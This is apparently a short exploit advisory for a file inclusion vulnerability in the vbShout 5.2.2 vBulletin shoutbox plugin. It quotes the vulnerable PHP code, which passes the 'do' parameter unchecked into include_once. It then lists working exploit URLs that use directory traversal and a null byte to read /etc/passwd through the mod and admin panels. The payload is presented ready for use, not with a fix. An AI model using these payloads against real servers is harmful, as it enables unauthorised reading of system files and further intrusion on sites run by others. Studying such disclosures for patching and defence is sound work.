#################################################++Title: vbShout 5.2.2 Remote/Local File Inlcusion (Mod/Admin)+Author:fred777 -[fred777.5x.to]+Link:http://www.dragonbyte-tech.com/vbecommerce.php?do=purchase&act=product&id=2+Vuln:vbshout.php?do=[path/file][NULL-Byte]+Greetzz to:SceneCoderz
+Contact: nebelfrost77@googlemail.com
+#################################################--[ Vuln Code ]--
modcp/vbshout.php:
admincp/vbshout.php:elseif(!empty($_GET['do'])){// We had a GET request instead
$action = $_GET['do'];if(!empty($_POST['do'])){// $_POST requests take priority
$action = $_POST['do'];}if(!file_exists(DIR .'/dbtech/vbshout/includes/actions/admin/'. $action .'.php')){if(!file_exists(DIR .'/dbtech/vbshout_pro/includes/actions/admin/'. $action .'.php')){// Throw error from invalid action
print_cp_message($vbphrase['dbtech_vbshout_invalid_action']);}else{// Include the selected file
include_once(DIR .'/dbtech/vbshout_pro/includes/actions/admin/'. $action .'.php');}}else{// Include the selected file
include_once(DIR .'/dbtech/vbshout/includes/actions/admin/'. $action .'.php');}=>../../../../../../etc/passwd%00################################################--[ Exploitable ]--
http://server/vbshout.php?do=[PATH/FILE][NULL-Byte]
http://server/vbshout.php?do=../../../../../../../../etc/passwd%00
You must be mod oder admin:
modcp/vbshout.php
admincp/vbshout.php
################################################